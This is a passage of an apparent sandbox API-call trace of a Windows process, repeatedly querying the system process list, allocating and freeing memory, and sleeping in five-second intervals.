SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.982] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.991] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.994] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.999] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.008] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.017] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.027] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.036] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.046] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.048] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.056] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.065] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.089] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.101] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.107] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.117] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.127] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.136] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.145] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.155] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.164] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.174] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.183] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.192] 